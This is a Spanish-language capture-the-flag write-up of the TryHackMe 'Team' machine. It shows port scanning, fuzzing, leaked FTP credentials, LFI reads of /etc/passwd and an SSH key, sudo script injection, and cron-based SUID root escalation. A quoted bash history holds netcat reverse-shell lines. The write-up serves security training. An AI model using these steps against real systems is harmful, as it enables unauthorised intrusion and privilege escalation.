Team es una maquina de TryHackMe, encontramos credenciales en el servicio FTP que nos llevaron a un nuevo subdominio donde descubrimos un LFI para luego enumerar los archivos y encontrar una clave privada para acceder por SSH. Cambiamos al siguiente usuario tras ejecutar un script en bash. Escalamos privilegios editando un ficher utilizado por un CronJob.
Room
Titulo |
Team |
Descripción |
Beginner friendly boot2root machine |
Puntos |
60 |
Dificultad |
Facil |
Maker |
dalemazza |
NMAP
Escaneo de puertos con nmap nos muestra el puerto ftp (21), http (80) y el puerto ssh (22) abiertos.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
Nmap 7.91 scan initiated Tue Mar 23 02:30:37 2021 as: nmap -p- --min-rate 10000 -oN allports 10.10.65.146
Nmap scan report for 10.10.65.146 (10.10.65.146)
Host is up (0.27s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
# Nmap done at Tue Mar 23 02:31:41 2021 -- 1 IP address (1 host up) scanned in 63.96 seconds
# Nmap 7.91 scan initiated Tue Mar 23 02:32:33 2021 as: nmap -p 21,22,80 -sV -sC -oN serviceports 10.10.65.146
Nmap scan report for 10.10.65.146 (10.10.65.146)
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
| 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 23 02:32:51 2021 -- 1 IP address (1 host up) scanned in 18.06 seconds
|
HTTP
Encontramos en la pagina web el dominio team.thm
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
HTTP/1.1 200 OK
Date: Tue, 23 Mar 2021 06:36:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 16 Jan 2021 14:11:21 GMT
ETag: "2c66-5b90510390674"
Accept-Ranges: bytes
Content-Length: 11366
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2014-03-19
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Ubuntu Default Page: It works! If you see this add 'team.thm' to your hosts!</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
|
GOBUSTER
Realizamos una enumeracion a la pagina del dominio encontrado, vemos la carpeta /script/
y /assets/
, a las cuales se realizó una enumeracion recursiva.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
#team.thm
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/scripts (Status: 301)
/server-status (Status: 403)
#team.thm/assets/
/css (Status: 301)
/fonts (Status: 301)
/js (Status: 301)
#team.thm/scripts/
/script.txt (Status: 200)
|
Encotramos un archivo de texto el cual contiene lo que pareciera ser un script para un “servidor” ftp. Además contiene un comentario en el que indica que existe el mismo archivo con una extension diferente y que contiene credenciales en este.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://team.thm/scripts/script.txt
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit
# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in
|
WFUZZ
Realizamos una enumeracion de extensiones utilizando WFUZZ con un wordlist de extensiones.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ wfuzz -c -w fuzz.txt --sc 200 http://team.thm/scripts/script.FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://team.thm/scripts/script.FUZZ
Total requests: 4833
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003247: 200 18 L 44 W 466 Ch "old"
Total time: 0
Processed Requests: 4833
Filtered Requests: 4832
Requests/sec.: 0
|
Encontramos la extension .old
. En el archivo encontramos un usuario y contraseña del servicio ftp.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://team.thm/scripts/script.old
#!/bin/bash
read -p "Enter Username: " ftpuser
read -sp "Enter Username Password: " T3@m$h@r3
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit
|
FTP
Ingresamos al servicio FTP con las credenciales encontradas. Vemos un archivo el cual contiene una nota del usuario Dale
, el cual indica que hay una pagina web PHP en desarrollo y se encuentra bajo el subdominio .dev
, además debemos de colocar nuestra clave ìd_rsa
en el archivo de configuracion.
1
2
3
4
5
6
7
8
9
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ cat New_site.txt
Dale
I have started coding a new website in PHP for the team to use, this is currently under development. It can be
found at ".dev" within our domain.
Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.
Gyles
|
DEV DALE SITE - LFI
Agregamos a nuestro archivo /etc/hosts
el subdominio dev.team.thm
. En este subdominio encontramos una pagina que contiene una direccion.
1
2
3
4
5
6
7
8
9
10
11
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/
<html>
<head>
<title>UNDER DEVELOPMENT</title>
</head>
<body>
Site is being built<a href=script.php?page=teamshare.php </a>
<p>Place holder link to team share</p>
</body>
</html>
|
En la direccion o pagina obtiene un parametro en la variable page
, despues de modificar el valor encontramos que existe una vulnerabilidad LFI.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=teamshare.php
<html>
<head>
<title>Team Share</title>
</head>
<body>
Place holder for future team share </body>
</html>
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=index.php
<html>
<head>
<title>UNDER DEVELOPMENT</title>
</head>
<body>
Site is being built<a href=script.php?page=teamshare.php </a>
<p>Place holder link to team share</p>
</body>
</html>
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/passwd | head
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
Realizamos la enumeracion de los usuarios con carpeta principal con lo cual logramos obtener nuestra flag user.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/passwd |grep "/home"
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
dale:x:1000:1000:anon,,,:/home/dale:/bin/bash
gyles:x:1001:1001::/home/gyles:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/bin/sh
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/home/dale/user.txt
THM{[...REDACTED...]}
|
DALE - USER
Despues de un intento fallido de obtener las claves privadas de los usuarios existentes, utilizamos un wordlist con WFUZZ para enumerar archivos que nos ayuden a obtener acceso a la maquina. Logramos obtener una lista de archivos, con los cuales logramos obtener informacion de la maquina. Realizando una lectura de cada archivo encontramos en el archivo /etc/ssh/sshd_config
la clave privada del usuario Dale.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ wfuzz -c -w lfi_paths.txt --hh 1 http://dev.team.thm/script.php?page=FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://dev.team.thm/script.php?page=FUZZ
Total requests: 1014
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000015: 200 230 L 1119 W 7313 Ch "/etc/apache2/apache2.conf"
[... REDACTED ...]
000000162: 200 13 L 17 W 383 Ch "/etc/os-release"
000000164: 200 16 L 59 W 553 Ch "/etc/pam.conf"
000000197: 200 19 L 113 W 736 Ch "/etc/resolv.conf"
000000184: 200 28 L 97 W 582 Ch "/etc/profile"
000000165: 200 34 L 42 W 1698 Ch "/etc/passwd"
000000166: 200 34 L 42 W 1696 Ch "/etc/passwd-"
000000219: 200 12 L 70 W 420 Ch "/etc/security/sepermit.conf"
000000220: 200 66 L 412 W 2180 Ch "/etc/security/time.conf"
000000216: 200 74 L 499 W 2973 Ch "/etc/security/pam_env.conf"
000000214: 200 29 L 217 W 1441 Ch "/etc/security/namespace.conf"
000000213: 200 57 L 347 W 2151 Ch "/etc/security/limits.conf"
000000210: 200 107 L 663 W 3636 Ch "/etc/security/group.conf"
000000206: 200 123 L 802 W 4621 Ch "/etc/security/access.conf"
000000260: 200 160 L 955 W 5937 Ch "/etc/vsftpd.conf"
000000252: 200 5 L 45 W 404 Ch "/etc/updatedb.conf"
000000248: 200 2 L 1 W 15 Ch "/etc/timezone"
000000246: 200 78 L 339 W 2684 Ch "/etc/sysctl.conf"
000000240: 200 169 L 447 W 5990 Ch "/etc/ssh/sshd_config"
000000379: 200 59 L 114 W 538 Ch "/proc/devices"
[... REDACTED ...]
000000630: 200 89 L 467 W 3029 Ch "/usr/share/adduser/adduser.conf"
Total time: 0
Processed Requests: 1014
Filtered Requests: 933
Requests/sec.: 0
|
Utilizamos la clave privada con lo que logramos obtener una shell con el usuario Dale
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/ssh/sshd_config
[... REDACTED ..]
----BEGIN OPENSSH PRIVATE KEY-----
#b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
#NhAAAAAwEAAQAAAYEAng6KMTH3zm+6rqeQzn5HLBjgruB9k2rX/XdzCr6jvdFLJ+uH4ZVE
[.. REDACTED ..]
#CPFMeoYeUdghftAAAAE3A0aW50LXA0cnJvdEBwYXJyb3QBAgMEBQYH
#-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ ssh -i dale_id_rsa dale@10.10.151.176 130 ⨯
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ whoami; id; pwd
dale
uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors)
/home/dale
dale@TEAM:~$
|
GYLES - USER
Realizamos una pequeña enumeracion y vemos que el usuario actual tiene permisos root mediante sudo ejecutar el script admmin_checks
, además tiene permisos de lectura.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
dale@TEAM:~$ sudo -l -l
Matching Defaults entries for dale on TEAM:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dale may run the following commands on TEAM:
Sudoers entry:
RunAsUsers: gyles
Options: !authenticate
Commands:
/home/gyles/admin_checks
dale@TEAM:~$ ls -lah /home/gyles/admin_checks
-rwxr--r-- 1 gyles editors 399 Jan 15 21:52 /home/gyles/admin_checks
dale@TEAM:~$ groups
dale adm cdrom sudo dip plugdev lxd lpadmin sambashare editors
|
El script realiza la ejecucion del comando date
solo si este se le pasa, en tal caso imprime una fecha y con este crea un archivo.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash
printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error # Pregunta por date
printf "The Date is "
$error 2>/dev/null # Ejecuta date
date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak
printf "Stats have been backed up\n"
|
Para tomar ventaja de esto pasamos /bin/bash
en lugar de date
para obtener una shell con el usuario gyles
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: batman
Enter 'date' to timestamp the file: /bin/bash
The Date is
whoami;id
gyles
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
which python
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash");'
gyles@TEAM:~$ pwd
/home/dale
gyles@TEAM:~$ cd /home
gyles@TEAM:/home$ cd gyles
gyles@TEAM:/home/gyles$ ls -lah
total 48K
drwxr-xr-x 6 gyles gyles 4.0K Jan 17 19:47 .
drwxr-xr-x 5 root root 4.0K Jan 15 20:21 ..
-rwxr--r-- 1 gyles editors 399 Jan 15 21:52 admin_checks
-rw------- 1 gyles gyles 5.6K Jan 17 20:34 .bash_history
-rw-r--r-- 1 gyles gyles 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 gyles gyles 3.7K Apr 4 2018 .bashrc
drwx------ 2 gyles gyles 4.0K Jan 15 21:38 .cache
drwx------ 3 gyles gyles 4.0K Jan 15 21:38 .gnupg
drwxrwxr-x 3 gyles gyles 4.0K Jan 15 21:51 .local
-rw-r--r-- 1 gyles gyles 807 Apr 4 2018 .profile
drwx------ 2 gyles gyles 4.0K Jan 15 21:43 .ssh
-rw-r--r-- 1 gyles gyles 0 Jan 17 15:05 .sudo_as_admin_successful
|
PRIVILEGE ESCALATION
Realizamos una enumeracion con el usuario Gyles
y encontramos en el archivo .bash_history
que se estuvieron editando varios scripts y ejecucion de shell inversas. Aparentemente algunos de los archivos son utilizados para restaurar los archivos de las paginas team.thm
y dev.team.thm
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
gyles@TEAM:/home/gyles$ cat .bash_history|grep ".sh"
cat /etc/shells
chsh -s /bin/bash
nc 192.168.88.128 -e /bin/bash
nc 192.168.88.128 < /bin/bash
[ .. REDACTED ..]
cat /usr/local/sbin/dev.backup.sh
cat /usr/local/bin/main_backup.sh
cat /opt/admin_stuff/script.sh
nano /usr/local/sbin/dev.backup.sh
sudo nano /usr/local/sbin/dev.backup.sh
sudo nano /opt/admin_stuff/script.sh
diff /usr/local/sbin/dev_backup.sh /usr/local/bin/main_backup.sh
sudo chmod +x dev_backup.sh
sudo rm dev.backup.sh
nano dev_backup.sh
nano /usr/local/bin/main_backup.sh
|
Ejecutamos pspy
para verificar si existe un cron para la ejecucion de estos scripts. Observamos que se ejecutan varios scripts: /opt/admin_stuff/script.sh
, /usr/local/sbin/dev_backup.sh
y /usr/local/bin/main_backup.sh
.
1
2
3
4
5
6
7
8
9
10
11
|
2021/03/23 08:43:01 CMD: UID=0 PID=1569 | /bin/bash /opt/admin_stuff/script.sh
2021/03/23 08:43:01 CMD: UID=0 PID=1568 | /bin/bash /opt/admin_stuff/script.sh
2021/03/23 08:43:01 CMD: UID=0 PID=1567 | /usr/sbin/CRON -f
2021/03/23 08:43:01 CMD: UID=0 PID=1570 | cp -r /var/www/team.thm/assets /var/www/team.thm/images /var/www/team.thm/index.html /var/www/team.thm/robots.txt /var/www/team.thm/scripts /var/backups/www/team.thm/
2021/03/23 08:43:01 CMD: UID=0 PID=1571 | /bin/bash /usr/local/sbin/dev_backup.sh
2021/03/23 08:43:01 CMD: UID=0 PID=1572 | cp -r /var/www/dev.team.thm/index.php /var/www/dev.team.thm/script.php /var/www/dev.team.thm/teamshare.php /var/backups/www/dev/
2021/03/23 08:43:48 CMD: UID=0 PID=1573 | ps -e -o pid,ppid,state,command
2021/03/23 08:44:01 CMD: UID=0 PID=1576 | /bin/bash /usr/local/bin/main_backup.sh
2021/03/23 08:44:01 CMD: UID=0 PID=1575 | /bin/bash /opt/admin_stuff/script.sh
2021/03/23 08:44:01 CMD: UID=0 PID=1574 | /usr/sbin/CRON -f
2021/03/23 08:44:01 CMD: UID=0 PID=1577 | cp -r /var/www/team.thm/assets /var/www/team.thm/images /var/www/team.thm/index.html /var/www/team.thm/robots.txt /var/www/team.thm/scripts /var/backups/www/team.thm/
|
Al verificar los permisos de los scripts vemos que tenemos permisos de lectura, escritura y ejecucion en el archivo /usr/local/bin/main_backup.sh
.
1
2
3
4
5
6
7
8
9
|
gyles@TEAM:/home/gyles$ ls -lah /opt/admin_stuff/script.sh
-rwxr--r-- 1 root root 200 Jan 17 20:38 /opt/admin_stuff/script.sh
gyles@TEAM:/home/gyles$ ls -lah /usr/local/sbin/dev_backup.sh
-rwxr-xr-x 1 root root 64 Jan 17 19:42 /usr/local/sbin/dev_backup.sh
gyles@TEAM:/home/gyles$ ls -lah /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
gyles@TEAM:/home/gyles$ id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
gyles@TEAM:/home/gyles$
|
Agregamos un comando para que este le de permisos SUID a bash
.
1
|
echo "chmod u+s /bin/bash" >> /usr/local/bin/main_backup.sh
|
Esperamos a que el cron se ejecute, luego de unos segundos obtiene los permisos.
gyles@TEAM:/home/gyles$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.1M Apr 4 2018 /bin/bash
gyles@TEAM:/home/gyles$ echo "chmod u+s /bin/bash" >> /usr/local/bin/main_backup.sh
gyles@TEAM:/home/gyles$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.1M Apr 4 2018 /bin/bash
Ejecutamos bash -p
con lo que logramos obtener una shell root y nuestra flag root.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
gyles@TEAM:/home/gyles$ bash -p
bash-4.4# whoami
root
bash-4.4# cd
bash-4.4# whoami; id; pwd
root
uid=1001(gyles) gid=1001(gyles) euid=0(root) groups=1001(gyles),1003(editors),1004(admin)
/home/dale
bash-4.4# cd /root
bash-4.4# ls
root.txt
bash-4.4# cat root.txt
THM{[... REDACTED ...]}
bash-4.4#
|